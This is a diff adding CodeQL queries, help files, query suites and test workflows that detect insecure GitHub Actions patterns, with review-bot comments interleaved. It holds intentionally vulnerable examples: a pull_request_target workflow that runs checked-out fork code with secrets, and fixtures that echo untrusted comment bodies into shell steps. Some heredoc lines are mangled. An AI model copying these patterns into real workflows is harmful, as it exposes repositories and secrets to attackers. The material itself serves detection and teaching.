actions/upload-artifact@v2 + with: + name: pr + path: pr/ +``` + +**CommentPR.yml** (processing artifacts with privileged access): + +```yaml +name: Comment on the pull request +on: + workflow_run: + workflows: ["Receive PR"] + types: + - completed +jobs: + upload: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + steps: + - name: "Download artifact" + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr"; + })[0]; + var download = await 
github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data)); + - run: | + mkdir -p tmp + unzip -d tmp/ pr.zip + - name: "Comment on PR" + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + var fs = require('fs'); + var issue_number = Number(fs.readFileSync('./tmp/NR')); + // Verify that the file contains a numeric value + const contains_numeric = /\d/.test(issue_number); + if (contains_numeric) { + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: issue_number, + body: 'Everything is OK. Thank you for the PR!' + }); + } +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql new file mode 100644 index 000000000000..c1d3729701d1 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql 
@@ -0,0 +1,55 @@
+/**
+ * @name Checkout of untrusted code in trusted context
+ * @description Privileged workflows have read/write access to the base repository and access to secrets.
+ * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment
+ * that is able to push to the base repository and to access secrets.
+ * @kind path-problem
+ * @problem.severity error
+ * @precision very-high
+ * @security-severity 9.3
+ * @id actions/untrusted-checkout/critical
+ * @tags actions
+ * security
+ * external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.PoisonableSteps
+import codeql.actions.security.ControlChecks
+
+query predicate edges(Step a, Step b) { a.getNextStep() = b }
+
+from PRHeadCheckoutStep checkout, PoisonableStep poisonable, Event event
+where
+ // the checkout is followed by a known poisonable step
+ checkout.getAFollowingStep() = poisonable and
+ (
+ poisonable instanceof Run and
+ (
+ // Check if the poisonable step is a local script execution step
+ // and the path of the command or script matches the path of the downloaded artifact
+ isSubpath(poisonable.(LocalScriptExecutionRunStep).getPath(), checkout.getPath())
+ or
+ // Checking the path for non local script execution steps is very difficult
+ not poisonable instanceof LocalScriptExecutionRunStep
+ // Its not easy to extract the path from a non-local script execution step so skipping this check for now
+ // and isSubpath(poisonable.(Run).getWorkingDirectory(), checkout.getPath())
+ )
+ or
+ poisonable instanceof UsesStep and
+ (
+ not poisonable instanceof LocalActionUsesStep and
+ checkout.getPath() = "GITHUB_WORKSPACE/"
+ or
+ isSubpath(poisonable.(LocalActionUsesStep).getPath(), checkout.getPath())
+ )
+ ) and
+ // the checkout occurs in a privileged context
+ inPrivilegedContext(poisonable, event) and
+ inPrivilegedContext(checkout, event) and
+ event.getName() = checkoutTriggers() and
+ not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and
+ not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout"))
+select poisonable, checkout, poisonable,
+ "Potential execution of untrusted code on a privileged workflow ($@)", event, event.getName()
diff --git a/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md b/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md
new file mode 100644
index 000000000000..71ba2032a9d0
--- /dev/null
+++ b/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md
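Review bot: The comment `// and the path of the command or script matches the path of the downloaded artifact` is copied from the artifact-poisoning queries; the `isSubpath` line under it compares against `checkout.getPath()`, so it should read `// and the script path lies inside the checked-out directory`. `checkout.getPath() = "GITHUB_WORKSPACE/"` is a bare string sentinel; a comment saying when `PRHeadCheckoutStep.getPath()` yields it (presumably when the step gives no `path:` input — I cannot confirm that from this hunk) would stop readers from grepping the library for it. `// Its not easy` should be `It's`, and the commented-out `isSubpath(poisonable.(Run).getWorkingDirectory(), ...)` line would be better as a TODO naming what is missing than as dead code.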
@@ -0,0 +1,137 @@ +# Execution of Untrusted Checked-out Code + +## Description + +GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Avoid using `pull_request_target` unless necessary. +- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. +- Use labels like `safe to test` to vet PRs and manage the execution context appropriately. + +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). + +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. 
+ +## Examples + +### Incorrect Usage + +The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker: + +```yaml +on: pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! +``` + +### Correct Usage + +An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context. + +**ReceivePR.yml** (untrusted PR handling with artifact creation): + +```yaml +name: Receive PR +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Build + run: /bin/bash ./build.sh + - name: Save PR number + run: | + mkdir -p ./pr + echo ${{ github.event.number }} > ./pr/NR + - uses: actions/upload-artifact@v2 + with: + name: pr + path: pr/ +``` + +**CommentPR.yml** (processing artifacts with privileged access): + +```yaml +name: Comment on the pull request +on: + workflow_run: + workflows: ["Receive PR"] + types: + - completed +jobs: + upload: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + steps: + - name: "Download artifact" + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr"; + })[0]; + var download = await 
github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data)); + - run: | + mkdir -p tmp + unzip -d tmp/ pr.zip + - name: "Comment on PR" + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + var fs = require('fs'); + var issue_number = Number(fs.readFileSync('./tmp/NR')); + // Verify that the file contains a numeric value + const contains_numeric = /\d/.test(issue_number); + if (contains_numeric) { + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: issue_number, + body: 'Everything is OK. Thank you for the PR!' + }); + } +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql new file mode 100644 index 000000000000..98b9aee33f77 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql 
@@ -0,0 +1,46 @@
+/**
+ * @name Checkout of untrusted code in trusted context
+ * @description Privileged workflows have read/write access to the base repository and access to secrets.
+ * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment
+ * that is able to push to the base repository and to access secrets.
+ * @kind problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 7.5
+ * @id actions/untrusted-checkout/high
+ * @tags actions
+ * security
+ * external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.PoisonableSteps
+import codeql.actions.security.ControlChecks
+
+from PRHeadCheckoutStep checkout, Event event
+where
+ // the checkout is NOT followed by a known poisonable step
+ not checkout.getAFollowingStep() instanceof PoisonableStep and
+ // the checkout occurs in a privileged context
+ inPrivilegedContext(checkout, event) and
+ event.getName() = checkoutTriggers() and
+ (
+ // issue_comment: check for date comparison checks and actor/access control checks
+ event.getName() = "issue_comment" and
+ not exists(ControlCheck check, CommentVsHeadDateCheck date_check |
+ (
+ check instanceof ActorCheck or
+ check instanceof AssociationCheck or
+ check instanceof PermissionCheck
+ ) and
+ check.dominates(checkout) and
+ date_check.dominates(checkout)
+ )
+ or
+ // not issue_comment triggered workflows
+ not event.getName() = "issue_comment" and
+ not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout"))
+ )
+select checkout, "Potential execution of untrusted code on a privileged workflow ($@)", event,
+ event.getName()
diff --git a/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md b/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md
new file mode 100644
index 000000000000..71ba2032a9d0
--- /dev/null
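Review bot: The `@description` and the select message are identical to the critical query's, yet this query fires only when the checkout is not followed by a known `PoisonableStep` and applies a separate rule for `issue_comment`, so an alert reader cannot tell why a finding is rated high rather than critical. Consider adding a description line such as ` * This variant reports checkouts that are not followed by a step known to execute the checked-out code.` and differentiating the message, e.g. `"Potential execution of untrusted code on a privileged workflow ($@); no step executing the checked-out code was identified"`. In the `issue_comment` branch the finding is suppressed only when an `ActorCheck`/`AssociationCheck`/`PermissionCheck` and a `CommentVsHeadDateCheck` both dominate the checkout; the existing comment reads as either/or, so `// suppressed only if BOTH an actor/access check AND a comment-vs-head date check dominate the checkout` would make the intent explicit.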
+++ b/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md 
@@ -0,0 +1,137 @@ +# Execution of Untrusted Checked-out Code + +## Description + +GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Avoid using `pull_request_target` unless necessary. +- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. +- Use labels like `safe to test` to vet PRs and manage the execution context appropriately. + +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). + +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. 
+ +## Examples + +### Incorrect Usage + +The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker: + +```yaml +on: pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! +``` + +### Correct Usage + +An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context. + +**ReceivePR.yml** (untrusted PR handling with artifact creation): + +```yaml +name: Receive PR +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Build + run: /bin/bash ./build.sh + - name: Save PR number + run: | + mkdir -p ./pr + echo ${{ github.event.number }} > ./pr/NR + - uses: actions/upload-artifact@v2 + with: + name: pr + path: pr/ +``` + +**CommentPR.yml** (processing artifacts with privileged access): + +```yaml +name: Comment on the pull request +on: + workflow_run: + workflows: ["Receive PR"] + types: + - completed +jobs: + upload: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + steps: + - name: "Download artifact" + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr"; + })[0]; + var download = await 
github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data)); + - run: | + mkdir -p tmp + unzip -d tmp/ pr.zip + - name: "Comment on PR" + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + var fs = require('fs'); + var issue_number = Number(fs.readFileSync('./tmp/NR')); + // Verify that the file contains a numeric value + const contains_numeric = /\d/.test(issue_number); + if (contains_numeric) { + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: issue_number, + body: 'Everything is OK. Thank you for the PR!' + }); + } +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql new file mode 100644 index 000000000000..66c68e882e22 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql 
@@ -0,0 +1,23 @@
+/**
+ * @name Checkout of untrusted code in trusted context
+ * @description Privileged workflows have read/write access to the base repository and access to secrets.
+ * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment
+ * that is able to push to the base repository and to access secrets.
+ * @kind problem
+ * @problem.severity warning
+ * @precision medium
+ * @security-severity 5.0
+ * @id actions/untrusted-checkout/medium
+ * @tags actions
+ * security
+ * external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+
+from PRHeadCheckoutStep checkout
+where
+ // the checkout occurs in a non-privileged context
+ inNonPrivilegedContext(checkout)
+select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.md
new file mode 100644
index 000000000000..cc371738d4aa
--- /dev/null
+++ b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.md
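Review bot: The alert message contradicts the where clause: the only condition is `inNonPrivilegedContext(checkout)` and the inline comment says "non-privileged context", yet the message reports a checkout "on privileged workflow", and the `@description` copied from the critical/high queries also speaks only of privileged workflows. Suggest `select checkout, "Potential unsafe checkout of untrusted pull request in a non-privileged workflow."` and a description line stating that this variant flags PR-head checkouts in non-privileged contexts as a weaker, defence-in-depth signal. Without that, a user comparing this alert with the high/critical ones will assume a privileged context was established when it was not.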
@@ -0,0 +1,29 @@
+# Unversioned Immutable Action
+
+## Description
+
+Using an immutable action without indicating proper semantic version will result in the version being resolved to a tag that is mutable. This means the action code can change between runs and without the user's knowledge. Using an immutable action with proper semantic versioning will resolve to the exact version
+of the action stored in the GitHub package registry. The action code will not change between runs.
+
+## Recommendations
+
+When using [immutable actions](https://github.com/github/package-registry-team/blob/main/docs/immutable-actions/immutable-actions-howto.md) use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs.
+
+## Examples
+
+### Incorrect Usage
+
+```yaml
+- uses: actions/checkout@some-tag
+- uses: actions/checkout@2.x.x
+```
+
+### Correct Usage
+
+```yaml
+- uses: actions/checkout@4.0.0
+```
+
+## References
+
+- [Consuming immutable actions]()
diff --git a/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql
new file mode 100644
index 000000000000..ac8cc249318e
--- /dev/null
+++ b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql
@@ -0,0 +1,18 @@
+/**
+ * @name Unversioned Immutable Action
+ * @description Using an Immutable Action without a semantic version tag opts out of the protections of Immutable Action
+ * @kind problem
+ * @problem.severity recommendation
+ * @precision high
+ * @id actions/unversioned-immutable-action
+ * @tags security
+ * actions
+ * external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.UseOfUnversionedImmutableAction
+
+from UnversionedImmutableAction step
+select step, "The workflow is using an eligible immutable action ($@) without semantic versioning",
+ step, step.getCallee()
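Review bot: The `@tags` list puts `security` before `actions`, the reverse of every other query in this commit, and unlike the other security-tagged queries here (the three untrusted-checkout queries and RequestForgery) this one carries no `@security-severity`; if it is meant to surface as a security alert a value should be added, otherwise the `security` tag is misleading. Suggest the tag order ` * @tags actions` / ` *   security` / ` *   external/cwe/cwe-829`. The `@description` also ends mid-thought; `Using an Immutable Action without a semantic version tag opts out of the protections of Immutable Actions.` reads as a sentence. The accompanying help file's `[Consuming immutable actions]()` reference has an empty URL, so the query's only external reference is a dead link.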
diff --git a/actions/ql/src/Security/CWE-918/RequestForgery.ql b/actions/ql/src/Security/CWE-918/RequestForgery.ql
new file mode 100644
index 000000000000..9721d666bd45
--- /dev/null
+++ b/actions/ql/src/Security/CWE-918/RequestForgery.ql
@@ -0,0 +1,23 @@
+/**
+ * @name Uncontrolled data used in network request
+ * @description Sending network requests with user-controlled data allows for request forgery attacks.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9.1
+ * @precision high
+ * @id actions/request-forgery
+ * @tags actions
+ * security
+ * experimental
+ * external/cwe/cwe-918
+ */
+
+import actions
+import codeql.actions.security.RequestForgeryQuery
+import RequestForgeryFlow::PathGraph
+
+from RequestForgeryFlow::PathNode source, RequestForgeryFlow::PathNode sink
+where RequestForgeryFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential request forgery in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md
new file mode 100644
index 000000000000..21a56e8d84d6
--- /dev/null
+++ b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md
@@ -0,0 +1,13 @@
+# Unneccesary use of advanced configuration
+
+## Description
+
+The CodeQL workflow does not use any custom settings and could be simplified by switching to the CodeQL default setup.
+
+## Recommendations
+
+If there is no reason to have a custom configuration switch to the CodeQL default setup.
+
+## References
+
+- [GitHub Docs: Configuring Default Setup for a repository](https://docs.github.com/en/code-security/code-scanning/enabling-code-scanning/configuring-default-setup-for-code-scanning#configuring-default-setup-for-a-repository)
\ No newline at end of file
diff --git a/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
new file mode 100644
index 000000000000..dc65fab292b3
--- /dev/null
+++ b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
@@ -0,0 +1,15 @@
+/**
+ * @name Workflow Should Use Default Setup
+ * @description Workflows should use CodeQL Action with default setup instead of advanced configuration if there are no customizations
+ * @kind problem
+ * @problem.severity recommendation
+ * @precision high
+ * @id actions/unnecessary-use-of-advanced-config
+ * @tags actions
+ * maintainability
+ */
+
+import codeql.actions.Violations_Of_Best_Practices.DefaultableCodeQLInitiatlizeActionQuery
+
+from DefaultableCodeQLInitiatlizeActionQuery action
+select action, "CodeQL Action could use default setup instead of advanced configuration."
diff --git a/actions/ql/src/change-notes/2024-12-19-initial-release.md b/actions/ql/src/change-notes/2024-12-19-initial-release.md
new file mode 100644
index 000000000000..e02078ea2731
--- /dev/null
+++ b/actions/ql/src/change-notes/2024-12-19-initial-release.md
@@ -0,0 +1,4 @@
+---
+category: newQuery
+---
+* Initial public preview release
diff --git a/actions/ql/src/codeql-pack.lock.yml b/actions/ql/src/codeql-pack.lock.yml
new file mode 100644
index 000000000000..53004274575d
--- /dev/null
+++ b/actions/ql/src/codeql-pack.lock.yml
@@ -0,0 +1,4 @@
+---
+lockVersion: 1.0.0
+dependencies: {}
+compiled: false
diff --git a/actions/ql/src/codeql-suites/actions-all.qls b/actions/ql/src/codeql-suites/actions-all.qls
new file mode 100644
index 000000000000..be9be8666201
--- /dev/null
+++ b/actions/ql/src/codeql-suites/actions-all.qls
@@ -0,0 +1,10 @@
+- description: Standard Code Scanning queries for Actions
+- queries: .
+- include:
+ kind:
+ - problem
+ - path-problem
+- exclude:
+ tags contain:
+ - debug
+ - model-generator
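Review bot: The imported module and class name `DefaultableCodeQLInitiatlizeActionQuery` misspells "Initialize"; the query can only use the name the library exports, so the rename must be made in the library module (outside this hunk) and here together, and doing it before the initial public release avoids a breaking rename later. The help file title `Unneccesary use of advanced configuration` has the same kind of typo (`Unnecessary`). The `@description` would also be more useful if it stated what counts as a customization, since that is what decides whether a workflow is flagged and the help file does not say either.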
diff --git a/actions/ql/src/codeql-suites/actions-bughalla.qls b/actions/ql/src/codeql-suites/actions-bughalla.qls
new file mode 100644
index 000000000000..0d718fac616e
--- /dev/null
+++ b/actions/ql/src/codeql-suites/actions-bughalla.qls
@@ -0,0 +1,6 @@
+- description: Bughalla queries for Actions
+- queries: '.'
+- exclude:
+ tags contain:
+ - debug
+
diff --git a/actions/ql/src/codeql-suites/actions-code-scanning.qls b/actions/ql/src/codeql-suites/actions-code-scanning.qls
new file mode 100644
index 000000000000..ce3ff4893356
--- /dev/null
+++ b/actions/ql/src/codeql-suites/actions-code-scanning.qls
@@ -0,0 +1,11 @@
+- description: Standard Code Scanning queries for Actions
+- queries: '.'
+- include:
+ problem.severity:
+ - error
+ - recommendation
+- exclude:
+ tags contain:
+ - experimental
+ - debug
+
diff --git a/actions/ql/src/codeql-suites/actions-security-and-quality.qls b/actions/ql/src/codeql-suites/actions-security-and-quality.qls
new file mode 100644
index 000000000000..ef332acb872c
--- /dev/null
+++ b/actions/ql/src/codeql-suites/actions-security-and-quality.qls
@@ -0,0 +1,11 @@
+- description: Security-and-quality queries for Actions
+- queries: '.'
+- include:
+ problem.severity:
+ - error
+ - recommendation
+- exclude:
+ tags contain:
+ - experimental
+ - debug
+
diff --git a/actions/ql/src/codeql-suites/actions-summaries-queries.qls b/actions/ql/src/codeql-suites/actions-summaries-queries.qls
new file mode 100644
index 000000000000..5526197c7db2
--- /dev/null
+++ b/actions/ql/src/codeql-suites/actions-summaries-queries.qls
@@ -0,0 +1,8 @@
+- description: Queries to model composite actions
+- queries: .
+
+- include:
+ kind:
+ - path-problem
+ tags contain:
+ - model-generator
diff --git a/actions/ql/src/qlpack.yml b/actions/ql/src/qlpack.yml
index 0cede827207b..f822a516e569 100644
--- a/actions/ql/src/qlpack.yml
+++ b/actions/ql/src/qlpack.yml
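Review bot: `actions-code-scanning.qls` and `actions-security-and-quality.qls` select exactly the same queries (severity `error` and `recommendation`, excluding `experimental` and `debug`), so the quality suite currently adds nothing over the default suite and the two will diverge silently if only one is edited later; if they are meant to be identical for now, a `# intentionally identical to actions-code-scanning.qls until quality queries exist` comment in the second file would say so. The severity filter also drops every `@problem.severity warning` query, which in this commit includes `UntrustedCheckoutMedium.ql`; if that query is opt-in by design, the suite description should mention it. `actions-bughalla.qls` excludes `debug` but not `model-generator`, unlike `actions-all.qls`, so the summaries queries would run in it — worth confirming that is intended.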
@@ -1,8 +1,10 @@
 name: codeql/actions-queries
-version: 0.0.1-dev
+version: 0.4.0-dev
 library: false
+warnOnImplicitThis: true
 groups: [actions, queries]
+suites: codeql-suites
 extractor: actions
+defaultSuiteFile: codeql-suites/actions-code-scanning.qls
 dependencies:
 codeql/actions-all: ${workspace}
-warnOnImplicitThis: true
diff --git a/actions/ql/test/codeql-pack.lock.yml b/actions/ql/test/codeql-pack.lock.yml
new file mode 100644
index 000000000000..53004274575d
--- /dev/null
+++ b/actions/ql/test/codeql-pack.lock.yml
@@ -0,0 +1,4 @@
+---
+lockVersion: 1.0.0
+dependencies: {}
+compiled: false
diff --git a/actions/ql/test/library-tests/.github/workflows/commands.yml b/actions/ql/test/library-tests/.github/workflows/commands.yml
new file mode 100644
index 000000000000..48aa5b5810bc
--- /dev/null
+++ b/actions/ql/test/library-tests/.github/workflows/commands.yml
@@ -0,0 +1,39 @@
+on: push
+
+defaults:
+ run:
+ shell: bash -wkf
+
+jobs:
+ local_commands:
+ runs-on: ubuntu-latest
+ defaults:
+ run:
+ shell: bash -job
+ steps:
+
+ - shell: bash -step
+ run: |
+ command1 ; command2
+ - run: |
+ command3 | command4
+ - run: |
+ command5 "$(command6)"
+ - run: |
+ command7 && command8
+ - run: |
+ command9 || command10
+ - run: |
+ command11 "`command12`"
+ - run: |
+ command13 "`command14` $(date | wc -l)"
+
+ local_commands2:
+ runs-on: ubuntu-latest
+ steps:
+ - shell: bash -step
+ run: |
+ command1 ; command2
+ - shell: pwsh
+ run: |
+ command3 | command4
diff --git a/actions/ql/test/library-tests/.github/workflows/expression_nodes.yml b/actions/ql/test/library-tests/.github/workflows/expression_nodes.yml
new file mode 100644
index 000000000000..1d40cabdd6ac
--- /dev/null
+++ b/actions/ql/test/library-tests/.github/workflows/expression_nodes.yml
@@ -0,0 +1,22 @@
+on: issue_comment
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: LINE 1echo '${{ github.event.comment.body }}'
+ - run: |
+ LINE 1 echo '${{ github.event.comment.body }}'
+ - run: |
+ LINE 1 echo '${{ github.event.comment.body }}'
+ LINE 2 echo '${{github.event.issue.body}}'
+ - run: >
+ LINE 1 echo '${{ github.event.comment.body }}'
+ echo '${{github.event.issue.body}}'
+ - run: |
+ LINE 1 echo '${{ github.event.comment.body }}'
+ LINE 2 echo '${{github.event.issue.body}}'
+ LINE 3 echo '${{ github.event.comment.body }}'
+ - run: "LINE 1 echo '${{ github.event.comment.body }}'
+ echo '${{github.event.issue.body}}'"
+
diff --git a/actions/ql/test/library-tests/.github/workflows/multiline.yml b/actions/ql/test/library-tests/.github/workflows/multiline.yml
new file mode 100644
index 000000000000..dafcd56bba91
--- /dev/null
+++ b/actions/ql/test/library-tests/.github/workflows/multiline.yml
@@ -0,0 +1,89 @@ +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Test: + runs-on: ubuntu-latest + steps: + - run: | + echo "changelog<> $GITHUB_OUTPUT + echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT + echo "CHANGELOGEOF" >> $GITHUB_OUTPUT + - run: | + EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) + echo "status<<$EOF" >> $GITHUB_OUTPUT + echo "$(cat status.output.json)" >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + echo "response<<$EOF" >> $GITHUB_OUTPUT + echo $output >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - run: | + cat <<-"EOF" > event.json + ${{ toJson(github.event) }} + EOF + - name: heredoc11 + run: | + cat >> $GITHUB_ENV << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc12 + run: | + cat > issue.txt << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc21 + run: | + cat << EOL >> $GITHUB_ENV + ${ISSUE_BODY} + FOO + EOL + - name: heredoc22 + run: | + cat < file.txt + Hello + World + EOF + - name: heredoc23 + run: | + cat <<-EOF >> "$GITHUB_ENV" + echo "FOO=$TITLE" + EOF + - name: line1 + run: | + echo REPO_NAME=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV + - name: multiline1 + run: | + echo "PR_TITLE<> $GITHUB_ENV + echo "$TITLE" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV + - name: block11 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - name: block12 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - name: block13 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/actions/ql/test/library-tests/.github/workflows/multiline2.yml b/actions/ql/test/library-tests/.github/workflows/multiline2.yml new file mode 100644 index 000000000000..1941dd8f22ab --- /dev/null +++ b/actions/ql/test/library-tests/.github/workflows/multiline2.yml 
